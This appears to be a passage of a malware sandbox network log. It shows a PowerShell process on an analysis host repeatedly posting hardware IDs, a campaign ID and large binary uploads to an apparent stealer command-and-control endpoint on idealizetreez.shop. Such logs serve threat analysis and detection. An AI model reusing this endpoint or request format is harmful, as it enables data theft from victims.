                                                                                            2025-01-15 17:25:39 UTC1369INData Raw: 54 4b 77 6f 54 4d 62 56 70 30 55 45 66 6b 43 37 32 41 78 52 6c 68 79 75 5a 58 4f 41 69 69 36 6e 44 39 53 43 41 62 46 33 34 41 69 73 4b 47 71 73 4a 31 45 6d 5a 54 55 6f 4a 66 34 39 7a 64 51 57 6e 48 30 52 70 72 56 75 47 6c 61 66 31 65 49 46 70 55 4e 45 4c 43 67 5a 53 34 78 52 4e 38 46 78 38 52 32 78 50 78 71 4d 55 65 65 5a 48 4b 53 41 30 36 67 65 68 36 76 67 67 69 4c 45 45 72 51 4d 65 48 68 59 57 38 49 30 55 67 44 77 6e 58 43 50 50 41 67 67 41 77 33 2f 34 61 65 30 53 51 71 7a 75 6c 52 6a 68 64 59 69 56 65 79 6f 57 55 71 73 38 4f 56 53 49 43 48 4a 4d 75 74 4a 2f 4c 47 58 32 56 68 78 52 7a 41 75 2b 39 4b 2f 4e 47 5a 41 77 58 66 67 43 57 32 64 66 6f 31 58 30 51 4b 30 59 65 6b 52 37 7a 31 70 42 42 4d 4a 57 48 41 6e 4e 44 72 50 64 70 75 77 56 32 48 68 41 59 62
                                                                                            Data Ascii: TKwoTMbVp0UEfkC72AxRlhyuZXOAii6nD9SCAbF34AisKGqsJ1EmZTUoJf49zdQWnH0RprVuGlaf1eIFpUNELCgZS4xRN8Fx8R2xPxqMUeeZHKSA06geh6vggiLEErQMeHhYW8I0UgDwnXCPPAggAw3/4ae0SQqzulRjhdYiVeyoWUqs8OVSICHJMutJ/LGX2VhxRzAu+9K/NGZAwXfgCW2dfo1X0QK0YekR7z1pBBMJWHAnNDrPdpuwV2HhAYb
                                                                                            2025-01-15 17:25:39 UTC1369INData Raw: 37 32 6e 30 51 62 31 31 55 68 6c 6a 68 6b 59 77 57 4d 4a 47 48 41 6d 46 4b 37 2f 63 37 35 55 59 6e 48 6b 55 30 56 73 65 55 67 66 79 38 45 33 63 33 42 67 6e 57 48 6f 61 4e 30 77 78 77 6a 50 6c 6b 45 67 71 6b 34 6e 65 72 4f 46 34 6f 56 43 68 65 77 35 53 54 2b 38 78 74 54 58 52 51 50 70 46 41 38 37 47 4d 54 32 6a 48 6e 78 6f 47 42 36 48 72 66 4b 73 58 4c 53 68 55 4e 31 50 45 69 63 4c 31 77 69 73 43 62 46 70 4a 6b 51 79 69 7a 70 70 66 49 74 79 53 43 57 52 55 2f 66 6f 31 70 45 5a 32 58 51 39 30 48 6f 53 51 77 75 50 43 61 6b 45 6d 47 67 48 53 48 72 44 4a 2f 44 46 57 68 4d 42 63 4d 41 71 34 39 44 6d 53 42 57 73 52 57 79 46 47 2b 72 79 58 75 49 77 6a 52 53 49 5a 52 35 39 49 76 4d 36 61 4e 6a 43 57 7a 56 31 2f 54 4f 50 30 61 4c 4d 4e 64 68 6f 58 47 52 36 45 6d 73
                                                                                            Data Ascii: 72n0Qb11UhljhkYwWMJGHAmFK7/c75UYnHkU0VseUgfy8E3c3BgnWHoaN0wxwjPlkEgqk4nerOF4oVChew5ST+8xtTXRQPpFA87GMT2jHnxoGB6HrfKsXLShUN1PEicL1wisCbFpJkQyizppfItySCWRU/fo1pEZ2XQ90HoSQwuPCakEmGgHSHrDJ/DFWhMBcMAq49DmSBWsRWyFG+ryXuIwjRSIZR59IvM6aNjCWzV1/TOP0aLMNdhoXGR6Ems


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.657635104.21.64.14436096C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-15 17:25:40 UTC275OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=7R1X44YR9
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 12804
                                                                                            Host: idealizetreez.shop
                                                                                            2025-01-15 17:25:40 UTC12804OUTData Raw: 2d 2d 37 52 31 58 34 34 59 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 37 31 46 44 44 34 42 39 31 44 32 30 35 35 41 35 43 42 46 45 46 31 43 35 44 38 44 38 34 45 0d 0a 2d 2d 37 52 31 58 34 34 59 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 37 52 31 58 34 34 59 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 52 49 49 49 0d 0a 2d 2d 37 52 31 58 34 34 59 52 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f
                                                                                            Data Ascii: --7R1X44YR9Content-Disposition: form-data; name="hwid"0E71FDD4B91D2055A5CBFEF1C5D8D84E--7R1X44YR9Content-Disposition: form-data; name="pid"2--7R1X44YR9Content-Disposition: form-data; name="lid"c2CoW0--RIII--7R1X44YR9Content-Dispo
                                                                                            2025-01-15 17:25:40 UTC1136INHTTP/1.1 200 OK
                                                                                            Date: Wed, 15 Jan 2025 17:25:40 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=iv657k2rf9p39lrbe95nvjh1dn; expires=Sun, 11 May 2025 11:12:19 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K2%2BGQ8CwSjVtlmj11gk%2B7yr%2Bv9YyTV0iqDSMuG8DvYJPrbqCREFzocxVDGh8d284h6bsSxeLN196pxS7M5zpvAsDjMuCmY%2FBZxsBiHUOkU8qS%2B2I3Y8dAyC0OH9p%2BamkUjZNHdc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 902790fdadb78ca1-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1939&min_rtt=1929&rtt_var=744&sent=7&recv=16&lost=0&retrans=0&sent_bytes=2847&recv_bytes=13737&delivery_rate=1450571&cwnd=168&unsent_bytes=0&cid=5373a6fccfae5660&ts=759&x=0"
                                                                                            2025-01-15 17:25:40 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                            Data Ascii: fok 8.46.123.189
                                                                                            2025-01-15 17:25:40 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.657644104.21.64.14436096C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-15 17:25:41 UTC274OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=QEDRH3K2
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 15044
                                                                                            Host: idealizetreez.shop
                                                                                            2025-01-15 17:25:41 UTC15044OUTData Raw: 2d 2d 51 45 44 52 48 33 4b 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 37 31 46 44 44 34 42 39 31 44 32 30 35 35 41 35 43 42 46 45 46 31 43 35 44 38 44 38 34 45 0d 0a 2d 2d 51 45 44 52 48 33 4b 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 51 45 44 52 48 33 4b 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 52 49 49 49 0d 0a 2d 2d 51 45 44 52 48 33 4b 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                            Data Ascii: --QEDRH3K2Content-Disposition: form-data; name="hwid"0E71FDD4B91D2055A5CBFEF1C5D8D84E--QEDRH3K2Content-Disposition: form-data; name="pid"2--QEDRH3K2Content-Disposition: form-data; name="lid"c2CoW0--RIII--QEDRH3K2Content-Dispositi
                                                                                            2025-01-15 17:25:41 UTC1128INHTTP/1.1 200 OK
                                                                                            Date: Wed, 15 Jan 2025 17:25:41 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=lakvfl4d4ua6joo89plho2kpvk; expires=Sun, 11 May 2025 11:12:20 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tqto2IU0e3t9CSvhtAZLCxcvfPpLRgYov2BzY0DjXt%2BsfenSKqnYeoBvkSI%2FURG3rP8qqA4YhESMeZAcn8KJ5bhIv5VLUpdiXTs6GWH0mBlVH2bAz9GNPzQlNbeYBz7kSAFGiUE%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 902791056ac742e9-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1747&min_rtt=1735&rtt_var=675&sent=9&recv=20&lost=0&retrans=0&sent_bytes=2846&recv_bytes=15976&delivery_rate=1593016&cwnd=241&unsent_bytes=0&cid=48ae928f4cefb193&ts=661&x=0"
                                                                                            2025-01-15 17:25:41 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                            Data Ascii: fok 8.46.123.189
                                                                                            2025-01-15 17:25:41 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.657654104.21.64.14436096C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-15 17:25:42 UTC283OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=KC1NO31LQLQP67DIL
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 19956
                                                                                            Host: idealizetreez.shop
                                                                                            2025-01-15 17:25:42 UTC15331OUTData Raw: 2d 2d 4b 43 31 4e 4f 33 31 4c 51 4c 51 50 36 37 44 49 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 37 31 46 44 44 34 42 39 31 44 32 30 35 35 41 35 43 42 46 45 46 31 43 35 44 38 44 38 34 45 0d 0a 2d 2d 4b 43 31 4e 4f 33 31 4c 51 4c 51 50 36 37 44 49 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 4b 43 31 4e 4f 33 31 4c 51 4c 51 50 36 37 44 49 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 52 49 49 49 0d 0a 2d 2d
                                                                                            Data Ascii: --KC1NO31LQLQP67DILContent-Disposition: form-data; name="hwid"0E71FDD4B91D2055A5CBFEF1C5D8D84E--KC1NO31LQLQP67DILContent-Disposition: form-data; name="pid"3--KC1NO31LQLQP67DILContent-Disposition: form-data; name="lid"c2CoW0--RIII--
                                                                                            2025-01-15 17:25:42 UTC4625OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f
                                                                                            Data Ascii: +?2+?2+?o?Mp5p_o
                                                                                            2025-01-15 17:25:43 UTC1131INHTTP/1.1 200 OK
                                                                                            Date: Wed, 15 Jan 2025 17:25:43 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=m88stigi3iii5n0mvsf2aq0jpi; expires=Sun, 11 May 2025 11:12:22 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=onXgryenzWsP88EwcqGVEuKuggZ7za554e9he7K8x7KKS6KIRozFsAwNfiLzjdFagp6ofWfXiRpj%2BMMsOP0sKU5X6%2B0DZhPg1rAoDeodM20U5tFATWEWMz2I0qkggG4lfRvQ%2FWs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 9027910dddccde95-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1637&min_rtt=1593&rtt_var=687&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2847&recv_bytes=20919&delivery_rate=1496668&cwnd=245&unsent_bytes=0&cid=38bc842da3f006fc&ts=718&x=0"
                                                                                            2025-01-15 17:25:43 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                            Data Ascii: fok 8.46.123.189
                                                                                            2025-01-15 17:25:43 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            7192.168.2.657662104.21.64.14436096C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-15 17:25:44 UTC275OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=QVZ0U5BFV3
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 1340
                                                                                            Host: idealizetreez.shop
                                                                                            2025-01-15 17:25:44 UTC1340OUTData Raw: 2d 2d 51 56 5a 30 55 35 42 46 56 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 37 31 46 44 44 34 42 39 31 44 32 30 35 35 41 35 43 42 46 45 46 31 43 35 44 38 44 38 34 45 0d 0a 2d 2d 51 56 5a 30 55 35 42 46 56 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 51 56 5a 30 55 35 42 46 56 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 52 49 49 49 0d 0a 2d 2d 51 56 5a 30 55 35 42 46 56 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                            Data Ascii: --QVZ0U5BFV3Content-Disposition: form-data; name="hwid"0E71FDD4B91D2055A5CBFEF1C5D8D84E--QVZ0U5BFV3Content-Disposition: form-data; name="pid"1--QVZ0U5BFV3Content-Disposition: form-data; name="lid"c2CoW0--RIII--QVZ0U5BFV3Content-D
                                                                                            2025-01-15 17:25:44 UTC1131INHTTP/1.1 200 OK
                                                                                            Date: Wed, 15 Jan 2025 17:25:44 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Set-Cookie: PHPSESSID=d8flual54863vk2h10tkvdj6qb; expires=Sun, 11 May 2025 11:12:23 GMT; Max-Age=9999999; path=/
                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                            Pragma: no-cache
                                                                                            X-Frame-Options: DENY
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            cf-cache-status: DYNAMIC
                                                                                            vary: accept-encoding
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gtBdbkWkbu41MVyXL8xvqRvU3pWJOMVoZEte6BGIbpfCnromw1Uc8cz7Lkb8Qvv8HGBK4MF%2Bapp6g2%2FwRygSk62B%2FHmxvEqI6eY84hcV2KvG9q1ZdLF661LQItfIdpBg1P%2B7Pis%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 902791167845c358-EWR
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=8676&min_rtt=1550&rtt_var=4950&sent=5&recv=9&lost=0&retrans=0&sent_bytes=2845&recv_bytes=2251&delivery_rate=1883870&cwnd=155&unsent_bytes=0&cid=91d7f651dc501ea1&ts=468&x=0"
                                                                                            2025-01-15 17:25:44 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                            Data Ascii: fok 8.46.123.189
                                                                                            2025-01-15 17:25:44 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            8192.168.2.657675104.21.64.14436096C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            2025-01-15 17:25:45 UTC282OUTPOST /api HTTP/1.1
                                                                                            Connection: Keep-Alive
                                                                                            Content-Type: multipart/form-data; boundary=PZ2UVVEOHBJJFZM
                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                            Content-Length: 587475
                                                                                            Host: idealizetreez.shop
                                                                                            2025-01-15 17:25:45 UTC15331OUTData Raw: 2d 2d 50 5a 32 55 56 56 45 4f 48 42 4a 4a 46 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 30 45 37 31 46 44 44 34 42 39 31 44 32 30 35 35 41 35 43 42 46 45 46 31 43 35 44 38 44 38 34 45 0d 0a 2d 2d 50 5a 32 55 56 56 45 4f 48 42 4a 4a 46 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 50 5a 32 55 56 56 45 4f 48 42 4a 4a 46 5a 4d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 63 32 43 6f 57 30 2d 2d 52 49 49 49 0d 0a 2d 2d 50 5a 32 55 56 56
                                                                                            Data Ascii: --PZ2UVVEOHBJJFZMContent-Disposition: form-data; name="hwid"0E71FDD4B91D2055A5CBFEF1C5D8D84E--PZ2UVVEOHBJJFZMContent-Disposition: form-data; name="pid"1--PZ2UVVEOHBJJFZMContent-Disposition: form-data; name="lid"c2CoW0--RIII--PZ2UVV
                                                                                            2025-01-15 17:25:45 UTC15331OUTData Raw: 4d 2f 2f 49 b7 22 a9 9e b5 88 60 ef 4e 2f 36 3e 7c a8 88 72 7f ef ee db 17 49 97 6b 4f d0 92 61 fe 62 81 2e a5 7f bd 5f 9c a5 98 06 aa ff f6 50 68 18 72 3e b6 d8 39 e2 fa 34 da 37 d1 9d 1e be ae 5d d2 c1 5a 8c 07 ba 19 a3 b9 cb 1c 02 0e 5a 21 a0 5c 05 29 51 26 fa ee 43 8f 3c f4 5a 4a bb 6b cd f0 99 28 b2 7d 57 ce 92 03 8a 3c 8f ea 8e 57 a6 39 8a f6 25 69 f1 b8 16 9a 8c 58 14 c7 b3 be 4e 8f 8b 7b e4 28 69 c5 06 c0 be 3e a8 c6 0d b3 6c bc ea 40 7e 6a aa 1a 67 e5 c2 70 38 e6 2e f7 ae 9e d3 69 7e 28 ee fe 79 73 77 d4 ad a4 56 49 74 2f 41 65 28 12 a9 ca 5c 83 55 37 0b 40 f2 ff be f0 80 f1 cd 4c 4c 9d 6f 27 6f 17 23 cb 30 08 ca ae e4 0c 0d dc 65 34 55 64 1e c4 c0 8b b5 a5 3d b5 d4 05 6f ef ad 0f 52 7e b0 80 d2 f3 6b 72 8e a5 6e 49 4f ab af 34 9d 81 c0 7e 51 14
                                                                                            Data Ascii: M//I"`N/6>|rIkOab._Phr>947]ZZ!\)Q&C<ZJk(}W<W9%iXN{(i>l@~jgp8.i~(yswVIt/Ae(\U7@LLo'o#0e4Ud=oR~krnIO4~Q
                                                                                            2025-01-15 17:25:45 UTC15331OUTData Raw: a1 c0 51 46 7e 11 06 ce 91 6e 36 d1 4b 62 7f 1b 6b 4d 53 6e c8 52 5a 26 f1 be 90 42 72 aa ea f5 20 3e 6f fd 07 c6 fa f3 28 44 2b fb 5c cf 90 35 b6 e7 16 ea 9f 69 29 1b c9 8f d3 30 d1 aa c0 7c 1d 6f 96 13 80 b1 c3 e7 78 61 7b ab a8 92 bf 90 fe 7a c6 50 d6 fd a5 ec eb 65 a4 84 2e cb 0d 45 70 ff d9 3c 52 ba 01 66 01 e4 7b aa 55 0e 42 12 a0 79 dc fb 25 27 dd 0f 9d c6 c7 35 88 83 79 c5 d5 f8 1e 11 c2 57 41 71 bb 78 9e a9 d5 49 52 3a 20 63 63 11 7d 5e 43 1a 59 c0 f6 f5 fb 84 c5 bd a7 ba 59 ed c3 e8 ae 3b e2 de dc db f4 6d 57 88 90 2c 02 1e 06 86 1f b3 c1 34 ba 51 60 a3 78 7e a3 da c2 0e c3 46 7d 25 cc 98 ce 09 ad 78 7d 85 db cb a3 93 c9 ba 23 81 0f 06 03 cf df fd 73 69 d7 96 7b 46 2b 9b af 05 4e 05 d6 6f 4f 2a 0f 2b 47 2c f1 b0 ba 4c 04 3e fc 67 fd 4a 03 8b 96
                                                                                            Data Ascii: QF~n6KbkMSnRZ&Br >o(D+\5i)0|oxa{zPe.Ep<Rf{UBy%'5yWAqxIR: cc}^CYY;mW,4Q`x~F}%x}#si{F+NoO*+G,L>gJ
                                                                                            2025-01-15 17:25:45 UTC15331OUTData Raw: f5 9a 1a 18 3e 5f fa 0c ae a2 9b 07 66 8d 93 39 c6 de 02 c9 23 b6 d5 0b a7 62 d8 fb 77 42 c3 f6 70 55 61 21 2e 0a 8a 19 8f 74 81 4b 3b 1c b0 93 2f 78 7d 8f 66 7e 21 35 fe d6 06 44 18 db 5d 12 bc c1 4c 0e 06 1c 48 38 a1 fb 47 e8 9f d1 35 df 09 10 c7 71 7a e5 0b 44 01 5c f7 fd 09 45 18 18 f9 6c 0a 88 bd 3e a6 a7 83 be c0 c8 b1 67 26 02 d6 96 b2 82 4b f7 8f fe 13 52 0c ec cf 4f 17 0f 66 1d c9 52 e8 d6 00 c7 1f 36 af 04 94 ad ca 67 95 1d 21 0e d4 ce 2c 4d 7c d1 07 58 4a 3d f7 05 4f b3 6b 8d f9 18 ab 71 a9 f1 77 59 7b 4a c3 8b 7c cb eb 10 28 a5 95 c8 9f e6 64 a2 a9 63 a3 a1 ef 55 12 4e 37 37 91 18 5d c1 1f 61 c4 da 00 a7 c4 15 87 36 45 76 2c 8c 3a 82 0c 0f 85 26 08 16 42 b5 ee 66 d4 70 61 b0 76 88 52 f1 f9 a0 36 7c e7 0a ea ef db 3a 7b a8 3f e1 84 43 ba 2b 2f
                                                                                            Data Ascii: >_f9#bwBpUa!.tK;/x}f~!5D]LH8G5qzD\El>g&KROfR6g!,M|XJ=OkqwY{J|(dcUN77]a6Ev,:&BfpavR6|:{?C+/
                                                                                            2025-01-15 17:25:45 UTC15331OUTData Raw: 80 ef 4b 59 84 8e ba e3 f4 4b ad e1 81 76 68 cc db 2f fd b6 c3 24 7f e3 8c 36 de 54 59 d0 a7 74 34 f5 14 d0 28 cd 52 00 05 99 2f 42 23 51 2f d3 72 58 4c af aa 6c dc db 37 10 56 86 1d 5c e2 a9 9c 88 74 9b 6f 6b e6 ef dd b8 11 3c e1 ba 4b b2 ef 98 41 81 d9 01 dc 6b 05 02 ee 1d b6 c3 44 17 01 60 2d db bc c0 ec 8f 42 24 9c 9c 46 ad f5 04 b4 0b 88 88 1b 19 5e 7d 2b 34 2b 40 b4 4d 2a b0 06 05 f6 ae 44 a5 8c ab 64 aa 21 ae 4f 05 e4 1e 91 29 d8 05 ec 4e a4 11 4c e1 54 13 32 21 bb 17 e3 55 f3 83 b0 da 1d a7 48 14 17 e4 e3 bb 84 22 0f 47 50 9d a6 b8 26 3f c9 d2 e2 b5 c4 7d a1 65 06 18 5d ff 5b 6f 8e 60 ed b8 75 fc 26 97 41 4a 96 c9 4f f0 16 83 e0 05 7e 3c c4 67 41 64 3e 36 40 a8 61 d7 cf 12 cf 4e bc 71 3d c2 b7 b0 c2 8a 53 f2 9a df 33 2b 75 40 98 73 0e 37 5d eb 24
